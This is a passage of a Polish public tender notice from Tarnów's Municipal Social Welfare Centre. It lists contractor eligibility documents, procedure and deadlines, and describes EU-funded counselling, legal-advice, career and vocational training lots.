Zamawiający dokona oceny spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia na podstawie (dotyczy zadań nr I - VI):

-	 oświadczenia złożonego przez Wykonawcę o spełnianiu warunków udziału  w postępowaniu w trybie art. 22 ust. 1 Prawa zamówień publicznych - sporządzonego według wzoru stanowiącego załącznik nr 2 do  specyfikacji istotnych warunków zamówienia, 

-	przedstawionego przez Wykonawcę Wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych  za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacji o podstawie do dysponowania tymi osobami - sporządzonego według wzoru stanowiącego załącznik nr 5 do  specyfikacji istotnych warunków zamówienia, 

-	 oświadczenia złożonego przez Wykonawcę, że osoby, które będą uczestniczyć  w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,  sporządzonego według wzoru stanowiącego załącznik nr 6 do specyfikacji istotnych warunków zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania  tego warunku.Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu w trybie art. 22 ust. 1  Prawa zamówień publicznych  - sporządzonego według wzoru stanowiącego załącznik nr 2 do  specyfikacji istotnych warunków zamówienia (dotyczy zadań:  I - VI).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą  brały udział w  realizacji części zamówienia, na zasadach określonych w art. 26 ust. 2b Prawa zamówień publicznych, zobowiązany jest udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Oferta musi być podpisana przez Wykonawcę lub jego pełnomocnika. Do oferty należy dołączyć pełnomocnictwo: 
- jeżeli oferta została podpisana przez pełnomocnika (o ile nie wynika to z innych
     dokumentów załączonych do  oferty), 
-  w przypadku składania  oferty wspólnej.   
Jeżeli osoba/osoby podpisująca ofertę działa na podstawie pełnomocnictwa, to pełnomocnictwo to musi w swej treści jednoznacznie wskazywać uprawnienie do  podpisania oferty. Pełnomocnictwo to musi zostać dołączone do oferty i musi być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem (kopia pełnomocnictwa musi być poświadczona  notarialnie). 
 
Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w Sekcji III 4.3.1), zastępuje się je dokumentem, zawierającym  oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Przewiduje się zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. Zmiany postanowień umowy: 
1)    mogą wynikać z wniosków Wykonawcy - przekazywanych w formie pisemnej - i mogą dotyczyć: 
a)	zmiany w harmonogramie zajęć - tylko w uzasadnionych przypadkach, pod warunkiem zachowania ostatecznego terminu realizacji umowy, 
b)	zmiany osób, określonych w wykazie osób, które będą uczestniczyć w wykonywaniu zamówienia (stanowiącym załącznik nr 1 do umowy), pod warunkiem, że zmiana ta jest konieczna z przyczyn niezależnych od Wykonawcy oraz, że osoba nie wykazana w załączniku nr 1 do umowy, a wskazana przez Wykonawcę do realizacji zamówienia, będzie posiadała wykształcenie i  kwalifikacje odpowiadające wymaganiom Zamawiającego określonych w specyfikacji istotnych warunków zamówienia, 
c)	zwiększenia wymiaru zajęć w poszczególnych dniach - powyżej 8 godzin zajęć szkoleniowych dziennie oraz zwiększenia liczby dni w tygodniu, w których będą mogły odbywać się poradnictwa/warsztaty/doradztwa/kursy/szkolenia - do siedmiu dni w tygodniu,  
2)   mogą wynikać z innych przyczyń niż określone w pkt 1, tj.: 
a)	zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy, 
b)	zaistnienia siły wyższej mającej wpływ na realizację umowy, 
c)	zmiany miejsca prowadzenia szkoleń, 
d)	nieistotnych zmian postanowień umowy w stosunku do treści oferty, wg której dokonano wyboru Wykonawcy (np. osoby upoważnionej do kontaktów, numerów telefonów, adresów wskazanych w umowie). 
2.   Wszelkie zmiany umowy wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.mops.tarnow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Tarnowie, 33- 100 Tarnów, al. Matki Bożej Fatimskiej 9, woj. małopolskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2014 godzina 10:00, miejsce: Oferty należy składać w siedzibie Zamawiającego w sekretariacie Miejskiego Ośrodka Pomocy Społecznej w Tarnowie, 33- 100 Tarnów,  al. Matki Bożej Fatimskiej 9, pokój nr 20, woj. małopolskie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy Stawiamy na aktywność. Działania aktywizujące klientów Miejskiego Ośrodka Pomocy Społecznej w Tarnowie - w tym Program Aktywności Lokalnej - współfinansowany ze środków Unii Europejskiej 
w ramach Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój  i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.	Zamawiający nie przewiduje zawarcia umowy ramowej oraz ustanowienia dynamicznego systemu zakupów..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie I: Zorganizowanie i przeprowadzenie  poradnictw, szkolenia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> A) Zorganizowanie i przeprowadzenie poradnictwa specjalistycznego z psychologiem pn. Budowanie własnego wizerunku,  Kod CPV: 85121270-6 - usługi psychiatryczne lub psychologiczne, 805 300 00 9 - usługi szkoleniowe. 
	Zakres zamówienia obejmuje zagadnienia:
-	analiza własnego stylu prezentacji pod kątem celu i audytorium,
-	techniki wywierania pozytywnego wrażenia,
-	efektywna komunikacja jako narzędzie autoprezentacji,
-	mowa ciała, praca głosem,
-	budowanie relacji z odbiorcami - atmosfera, przestrzeń, dynamika,
-	profesjonalna prezentacja - przygotowanie merytoryczne i mentalne,
-	sposoby eliminacji stresu, 
-	swoboda głosowa - dynamizm, dykcja, akcentowanie, modulowanie głosem, 
-	wygląd zewnętrzny w autoprezentacji,
-	 wpływ kolorów na wygląd osobisty, ubiór i makijaż. 
Zajęcia odbywać się będą  m. in. z wykorzystaniem  kamery wideo. 
Dodatkowo tematyka poradnictwa związana będzie z  bieżącymi potrzebami uczestników, które zgłoszą podczas spotkań. 
Liczba uczestników 37 osób w dwóch grupach.
Liczba  godzin  20 godzin (jedna grupa) - łącznie 40 godzin. 

B)  Zorganizowanie i przeprowadzenie szkolenia Trening kompetencji społecznych, Kod CPV: 80 53 00 00 - 8 - usługi szkolenia zawodowego,  80 53 00 00 9 - usługi szkoleniowe,  85 12 12 70 - 6 - usługi psychiatryczne lub psychologiczne. Zakres zamówienia obejmuje cztery bloki tematyczne:
I. Komunikacja interpersonalna 
Pierwszy blok tematyczny obejmuje zagadnienia z zakresu:
-	cech dobrej komunikacji,
-	zakłóceń w komunikacji,
-	komunikacji werbalnej i niewerbalnej, 
-	kontaktu z samym sobą - kontaktu z drugim człowiekiem, otwartości na drugiego człowieka,
-	istotnych elementów w  komunikacji z drugim człowiekiem,
-	komunikacji w miejscu pracy.
II. Rozwiązywanie problemów oraz umiejętność radzenia sobie w trudnych sytuacjach. 
Drugi blok tematyczny obejmuje zagadnienia z zakresu:
-	psychologii konfliktu,
-	rozwiązywania konfliktów, 
-	radzenia sobie w trudnych sytuacjach życiowych,
-	radzenia sobie ze stresem.
III. Uwierz w siebie. 
Trzeci blok tematyczny obejmuje:
-	analizę słabych i mocnych stron, odpowiedzialność za własną osobę i przyszłość, 
-	umiejętność kreatywnego myślenia, 
-	wzorce, przekonania, nawyki - po co je zmieniać?,
-	budowa poczucia własnej wartości, podniesienie pewności siebie, 
-	wpływ sposobu myślenia na nasze życie,
-	wizualizacja jako tworzenie wizji szczęśliwego życia,
-	autoprezentacja, budowanie własnego wizerunku.
 IV. Umiejętności społeczne.  
Czwarty blok tematyczny obejmuje zagadnienia z zakresu:
-	asertywności (definicje, czym jest asertywność),
-	stawiania sobie celów i ich osiągania,
-	budowania więzi emocjonalnych,
-	umiejętności wyrażania własnych opinii (konstruktywna krytyka, komplement), 
-	umiejętności wyrażania negatywnych i pozytywnych uczuć,
-	empatii, 
-	nawiązywania i budowania relacji z ludźmi,
Techniki pracy: mini - wykłady, arkusze i testy ćwiczeniowe, dyskusja, ćwiczenia z wykorzystaniem m.in. kamery video. 
Liczba uczestników	 14 osób.  
Liczba  godzin	 56 godzin.  

C) Zorganizowanie i przeprowadzenie  poradnictwa z  prawnikiem  z zakresu prawa pracy z elementami prawa cywilnego oraz przepisami dotyczącymi ochrony praw lokatorów, Kod CPV: 79 14 00 00-7 - doradztwo prawne i usługi informacyjne, 79 11 10 00 - 5 usługa w zakresie doradztwa prawnego,  80 53 00 00 - 9 - usługi szkoleniowe. 

	Zakres  zamówienia obejmuje zagadnienia: 
Nawiązywanie umów o pracę: 
-	prawa i obowiązki pracodawcy i pracownika,
-	rodzaje umów o pracę,
-	elementy umowy o pracę,
-	sporządzenie przykładowej umowy o pracę,
-	potrącenia  z wynagrodzenia za pracę
Zatrudnianie: 
-	porównanie umowy o pracę, umowy zlecenia i umowy o dzieło,
-	dokumentowanie stosunku pracy,
-	podstawowe zasady dotyczące wynagradzania pracownika,
-	sporządzenie przykładowej listy płac,
-	podstawowe obowiązki pracodawcy w zakresie ubezpieczeń społecznych, ubezpieczenia zdrowotnego,
-	sporządzenie wybranych dokumentów zgłoszeniowych na potrzeby ubezpieczeniowe (np. ZUA), rozliczeniowe (DRA, RMUA),
-	zasady odprowadzania składek ZUS, składki na ubezpieczenie zdrowotne, Fundusz Pracy, Fundusz Gwarantowanych Świadczeń Pracowniczych, zaliczki na podatek dochodowy od osób fizycznych.
Zmiana warunków zatrudnienia i rozwiązywanie umów o pracę:  
-	zmiana warunków pracy i płacy, 
-	sposoby rozwiązywania umów (porozumienie, wypowiedzenie, rozwiązanie umowy bez wypowiedzenia). 
Czas pracy - definicje, wymiar, systemy czasu pracy, praca w godzinach nadliczbowych, 
  w porze nocnej oraz w niedziele i święta: 
-	definicja czasu pracy, czas pracy  w podróży służbowej pracownika oraz w czasie szkoleń pracowniczych,  systemy i rozkłady czasu pracy, dopuszczalność pracy w godzinach nadliczbowych, w  porze nocnej, niedziele i święta (aspekty praktyczne). 
Zagadnienia z zakresu prawa cywilnego - dotyczące umowy pożyczki, umowy poręczenia, umowy kredytu bankowego, postępowania egzekucyjnego w świetle kodeksu postępowania cywilnego.
Zasady i formy ochrony praw lokatorów oraz zasady gospodarowania mieszkaniowym zasobem gminy.

W ramach konsultacji  indywidualnych  omówione zostaną  zagadnienia z zakresu prawa pracy,  wybranych zagadnień z zakresu prawa cywilnego  oraz  form ochrony lokatorów i zasad gospodarowania  mieszkaniowym zasobem gminy  - zgłaszane przez uczestników zajęć.
Liczba uczestników	59 osób  w trzech grupach - równomiernie podzielonych.  
Liczba godzin	24 godziny - każda grupa + 1 godzina konsultacji indywidualnej z każdym uczestnikiem - łącznie 131 godzin. 

	D) Zorganizowanie i przeprowadzenie  poradnictwa z  prawnikiem  z zakresu prawa rodzinnego, Kod CPV: 79 14 00 00-7 - doradztwo prawne i usługi informacyjne,  79 11 10 00 - 5 usługa w zakresie doradztwa prawnego,  80 53 00 00 9 - usługi szkoleniowe. 

	Zakres zamówienia obejmuje zagadnienia:
Ustanie małżeństwa: 
-  unieważnienie małżeństwa, rozwiązanie małżeństwa przez rozwód, 
Majątkowe ustroje małżeńskie: 
-  rodzaje majątkowych ustrojów małżeńskich, zniesienie małżeńskiej wspólności ustawowej, podział majątku wspólnego,
Obowiązek alimentacyjny: 
- przesłanki i zakres zakresu obowiązku alimentacyjnego, egzekucja świadczeń alimentacyjnych, 
Władza rodzicielska: 
- powstanie władzy rodzicielskiej, zakres władzy rodzicielskiej,  ingerencja w wykonywanie władzy rodzicielskiej, 
Pochodzenie dziecka: 
- sposoby ustalania pochodzenia dziecka,  w tym:  instytucja uznania dziecka, sądowego ustalenia pochodzenia dziecka, zaprzeczenia macierzyństwa i ojcostwa. 
Liczba uczestników	2 osoby.
Liczba godzin	8 godzin + 2 godziny konsultacji indywidualnych  z każdym uczestnikiem - łącznie 12  godzin. 

	E) Zorganizowanie i przeprowadzenie poradnictwa Szkoła dobrego rodzicielstwa, Kod CPV:  80 53 00 00 - 8 - usługi szkolenia zawodowego,  80 53 00 00 9 - usługi szkoleniowe,  85 12 12 70-6 - usługi psychiatryczne lub psychologiczne. 

	Zakres zamówienia obejmuje zagadnienia: 
- kreowanie odpowiedzialnego rodzicielstwa,
- efektywne spędzanie wolnego czasu - elementy pedagogiki zabawy,  
- stworzenie optymalnych warunków do nauki, 
- budowanie poczucia własnej wartości oraz samodzielności dziecka,
- komunikacja w rodzinie i rozwiązywanie problemów wychowawczych, młodzieńczy bunt,
- normy i zasady w wychowaniu,
- zasady aktywnego słuchania,
- rozwiązywanie konfliktów w rodzinie,
- zagrożenia: alkohol, narkotyki, zaburzenia łaknienia, itp.,
- budowanie stosunków partnerskich w rodzinie ze szczególnym uwzględnieniem relacji z dzieckiem,
- praktyczne zastosowanie metod wychowawczych z uwzględnieniem indywidualnych cech dziecka.
Liczba uczestników	7 osób. 
Liczba godzin	24 godziny. 

	F) Zorganizowanie i przeprowadzenie poradnictwa z psychologiem Radzenie sobie ze stresem, Kod CPV:  80 53 00 00 - 8 - usługi szkolenia zawodowego,  80 53 00 00 9 - usługi szkoleniowe,  85 12 12 70-6 - usługi psychiatryczne lub psychologiczne.

	Zakres zamówienia obejmuje zagadnienia:
- teorię stresu i jego wpływ na człowieka,
- mechanizmy i rodzaje stresu,
- konsekwencje spowodowane chronicznym stresem,
- zapoznanie uczestników z technikami relaksacji,
- zapoznanie uczestników z metodami radzenia sobie ze stresem.
Liczba uczestników	2 osoby. 
Liczba godzin	24 godziny.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.12.70-6, 80.53.00.00-9, 79.14.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie II: Zorganizowanie i przeprowadzenie doradztwa zawodowego oraz warsztatów aktywnego poszukiwania pracy i warsztatów aktywizacji zawodowej:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> A)	Zorganizowanie i przeprowadzenie doradztwa zawodowego,  Kod CPV: 85 31 23 20 - 8 - usługa doradztwa, 80 53 00 00 9 - usługi szkoleniowe.  

Zakres zamówienia obejmuje zagadnienia:
- świadczenie usług przez Wykonawcę w zakresie informacji i poradnictwa zawodowego, związanych z planowaniem kariery zawodowej udzielanej w formie porad zawodowych,
- udzielanie porad grupowych związanych z podejmowaniem decyzji zawodowych w zakresie wyboru zawodu, kierunku dalszego kształcenia lub szkolenia zawodowego oraz miejsca pracy,
- przekazywanie wiedzy i informacji o zawodach, możliwościach zdobycia kwalifikacji zawodowych, sytuacji na rynku pracy; stosowanie właściwych metod, narzędzi i technik z obszaru poradnictwa zawodowego.
Zakres merytoryczny zadania: 
- doradztwo zawodowe obejmujące: przygotowanie dokumentów aplikacyjnych (CV, list motywacyjny), przygotowanie do rozmowy o pracę, autoprezentacja w kontaktach z pracodawcą, sposoby aktywnego poszukiwania pracy, planowanie kariery zawodowej,
- wybór kierunku dalszego kształcenia, szkolenia zawodowego oraz miejsca pracy, budowanie ścieżki rozwoju zawodowego, możliwości dokształcania zawodowego, sytuacja na rynku pracy. 

W wyniku doradztwa zawodowego dla każdego uczestnika zostanie sporządzony Indywidualny Plan Działania.
Liczba uczestników	27 osób w dwóch grupach. 
Liczba  godzin	8 godzin - każda grupa + 1 godzina konsultacji indywidualnej z każdym uczestnikiem - łącznie 43 godziny. 


B) Zorganizowanie i przeprowadzenie warsztatów aktywnego poszukiwania pracy, Kod CPV: 85 31 23 20 - 8 - usługa doradztwa, 80 53 00 00 9 - usługi szkoleniowe,  

Zakres zamówienia obejmuje zagadnienia (tematyka warsztatów): 
-	metody poszukiwania pracy, 
-	zapoznanie uczestników z aktywnymi formami poszukiwania pracy, 
-	nabycie przez uczestników nowych umiejętności zwiększających szansę powrotu do pracy, 
-	wskazanie możliwości wykorzystania Internetu w poszukiwaniu pracy,
-	przygotowanie dokumentów aplikacyjnych,
-	przygotowanie uczestników do rozmowy kwalifikacyjnej (najczęściej zadawane pytania przez pracodawców, wymogi pracodawców, autoprezentacja). 
Liczba uczestników	20  osób.
Liczba  godzin	16 godzin. 

C) Zorganizowanie i przeprowadzenie warsztatów aktywizacji zawodowej, Kod CPV: 85 31 23 20 - 8 - usługa doradztwa, 80 53 00 00 9 - usługi szkoleniowe.   

	Zakres zamówienia obejmuje zagadnienia (tematyka warsztatów): 

- pomoc uczestnikom w poznaniu własnych kompetencji, predyspozycji oraz innych czynników mających wpływ na kształtowanie drogi zawodowej,
- planowanie własnej kariery zawodowej, 
- przekazywanie wiedzy i informacji o zawodach, możliwościach zdobycia kwalifikacji zawodowych, 
- dokonywanie samooceny; analiza wykształcenia, doświadczenia zawodowego, zainteresowań, umiejętności,
- diagnozę predyspozycji zawodowych,
- określenie branż/stanowisk pracy, w których istnieją największe szanse na zatrudnienie
   pracowników, 
- świadczenie usług w zakresie informacji o tarnowskim rynku pracy, przygotowania dokumentów aplikacyjnych, omówienie metod poszukiwania pracy i przygotowania do rozmowy z pracodawcą. 
Zakres merytoryczny zamawianej usługi: 
- przygotowanie dokumentów aplikacyjnych, przygotowanie do rozmowy  z pracodawcą, 
- określenie kwalifikacji,
- wskazanie wartości związane z pracą,
- autoprezentacja w kontaktach z pracodawcą, sposoby aktywnego poszukiwania pracy,
- planowanie kariery zawodowej, 
- poznanie motywów swoich wyborów edukacyjnych,
- wybór kierunku dalszego kształcenia, szkolenia zawodowego oraz miejsca pracy, 
- budowanie ścieżki rozwoju zawodowego, możliwości dokształcania zawodowego, 
- analiza kompetencji i predyspozycji zawodowych.
Liczba uczestników	 13 osób.  
Liczba  godzin	16 godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.20.29-8, 80.53.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie III: Zorganizowanie i przeprowadzenie kursów: obsługi kasy fiskalnej, programów magazynowych i fakturujących (magazynier), kursu - księgowość komputerowa,  obsługi komputera i urządzeń biurowych, sprzedawca z obsługą kasy fiskalnej, fakturzysta z obsługą kasy fiskalnej:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> A) Kurs obsługi kasy fiskalnej, programów magazynowych i programów fakturujących (magazynier),  Kod CPV: 80 53 00 00 8 usługi szkolenia zawodowego, 80 530 0 00 9 - usługi szkoleniowe. 
Zakres zamówienia obejmuje nabycie przez uczestników wiedzy i umiejętności w zakresie:
- przepisów i norm w magazynowaniu,
- organizacji gospodarki magazynowej,
- zagospodarowania magazynu i technologii magazynowania,
- prowadzenia dokumentacji; obiegu  dokumentów i towarów,
-	samodzielnego sporządzania dokumentów magazynowych, 
-	obsługi programów magazynowych,
-	zaznajomienia z  programem finansowo -  księgowym (moduł dotyczący logistyki),
-	obsługi programu magazynowo - księgowego,
-	obowiązujących przepisów prawno-fiskalnych,
-	obsługi kasy fiskalnej, 
-	obsługi programu do fakturowania, 
-	wystawiania faktur i paragonów. 
Liczba uczestników	 14 osób. 
Liczba  godzin	50 godzin, w  tym 15 godzin zajęć teoretycznych i 35  godzin zajęć praktycznych. 

B) Kurs księgowość komputerowa, Kod CPV: 80 53 00 00 8 - usługi szkolenia zawodowego,  80 53 00 00 9 - usługi szkoleniowe.
Zakres zamówienia obejmuje nabycie przez uczestnika wiedzy i umiejętności  w zakresie:
-	podstaw rachunkowości,
-	 praktycznego stosowania programów komputerowych w prowadzeniu księgowości w firmie na przykładzie komputerowego systemu finansowo-księgowego oraz programu PŁATNIK.
Liczba uczestników	1 osoba.  
Liczba  godzin	 24 godziny.  


C) Kurs obsługi komputera i urządzeń biurowych, Kod CPV: 80 53 00 00 8 usługi szkolenia zawodowego,  80 53 00 00 9 - usługi szkoleniowe.
Zakres zamówienia obejmuje nabycie przez uczestników wiedzy i umiejętności w zakresie:
- konfiguracji środowiska pracy,
- systemów operacyjnych, 
- przetwarzania tekstów, 
- arkuszy kalkulacyjnych, 
- zarządzania plikami,
- obsługi drukarki i innych urządzeń peryferyjnych, 
- konfiguracji połączenia z Internetem,
- korespondencji seryjnej,
- tworzenia baz danych i raportów,
- obsługi  urządzeń biurowych. 
Liczba uczestników	2 osoby. 
Liczba  godzin	40 godzin  (praca przy stanowiskach komputerowych).  


D) Kurs - sprzedawca z obsługą kasy fiskalnej, Kod CPV: 80 53 00 00 8 usługi szkolenia zawodowego,  80 53 00 00 9 - usługi szkoleniowe.
 Zakres zamówienia obejmuje nabycie przez uczestników wiedzy i umiejętności w zakresie: 
- organizacji handlu w gospodarce rynkowej,
- wprowadzania faktur w sprzedaży detalicznej,
- organizowania zapotrzebowania i przyjmowania dostaw towarów,
- wykonywania i dokumentowania podstawowych obliczeń sklepowych,
- fakturowania komputerowego,
- obsługi kasy fiskalnej.
Liczba uczestników	 5 osób. 
Liczba  godzin	40 godzin,  w tym  32 godziny zajęć teoretycznych i 8 godzin zajęć praktycznych.  

	E) Kurs fakturzysta z obsługą kasy fiskalnej, Kod CPV: 80 53 00 00 8 - usługi szkolenia zawodowego,   805 300 00 9 - usługi szkoleniowe.
	 Zakres zamówienia obejmuje nabycie przez uczestników wiedzy i umiejętności w zakresie: 
- wystawiania faktur, raportów oraz innych pokwitowań,
- obsługi programu do fakturowania,
- obsługiwania kasy fiskalnej,
- prowadzenia dokumentacji handlowej i magazynowej,
- obsługi programu magazynowego, 
- przyjmowania należności niepieniężnych,
- świadomego posługiwanie się prawnymi aspektami sprzedaży.
Liczba uczestników	11 osób.   
Liczba  godzin	40 godzin, w tym 16 godzin zajęć teoretycznych  oraz 24 godziny zajęć praktycznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.53.00.00-9.</p></li>
